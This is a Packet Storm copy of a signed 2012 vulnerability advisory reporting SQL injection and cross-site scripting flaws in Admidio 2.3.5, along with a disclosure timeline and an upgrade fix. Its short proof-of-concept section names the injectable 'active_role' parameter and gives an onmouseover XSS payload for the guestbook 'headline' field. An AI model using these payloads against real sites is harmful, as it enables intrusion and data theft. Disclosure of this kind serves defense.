Lucene search

K
packetstormStefan SchurtzPACKETSTORM:116155
HistorySep 01, 2012 - 12:00 a.m.

Admidio 2.3.5 Cross Site Scripting / SQL Injection

2012-09-0100:00:00
Stefan Schurtz
packetstormsecurity.com
23
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Advisory: Admidio 2.3.5 Multiple security vulnerabilities  
Advisory ID: SSCHADV2012-019  
Author: Stefan Schurtz  
Affected Software: Successfully tested on Admidio 2.3.5  
Vendor URL: http://www.admidio.org/  
Vendor Status: fixed  
  
==========================  
Vulnerability Description  
==========================  
  
Admidio 2.3.5 is prone to XSS and SQLi vulnerabilities  
  
==================  
PoC-Exploit  
==================  
  
//SQLi  
  
http://[target]/admidio-2.3.5/adm_program/modules/lists/lists.php?active_role=[sql-injection]  
  
//XSS  
  
http://[target]/admidio-2.3.5/adm_program/modules/guestbook/guestbook_new.php?headline="  
onmouseover=alert(/xss/) "  
  
=========  
Solution  
=========  
  
Upgrade to the latest version 2.3.6  
  
====================  
Disclosure Timeline  
====================  
  
21-Aug-2012 - developer informed  
21-Aug-2012 - feedback from developer  
28-Aug-2012 - fixed in version 2.3.6  
  
========  
Credits  
========  
  
Vulnerabilities found and advisory written by Stefan Schurtz.  
  
===========  
References  
===========  
  
http://www.admidio.org/forum/viewtopic.php?t=5108  
http://www.darksecurity.de/advisories/2012/SSCHADV2012-019.txt  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.12 (MingW32)  
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools  
Comment: Download at: http://thunderbird.gnupt.de  
  
iEYEARECAAYFAlBByQ4ACgkQg3svV2LcbMC4kwCeK+vGuSrJ4qHy2ILFE8arppud  
gjgAn3eJnDuVB94NXFAbVZUraLUcjlVq  
=wJLS  
-----END PGP SIGNATURE-----  
  
  
`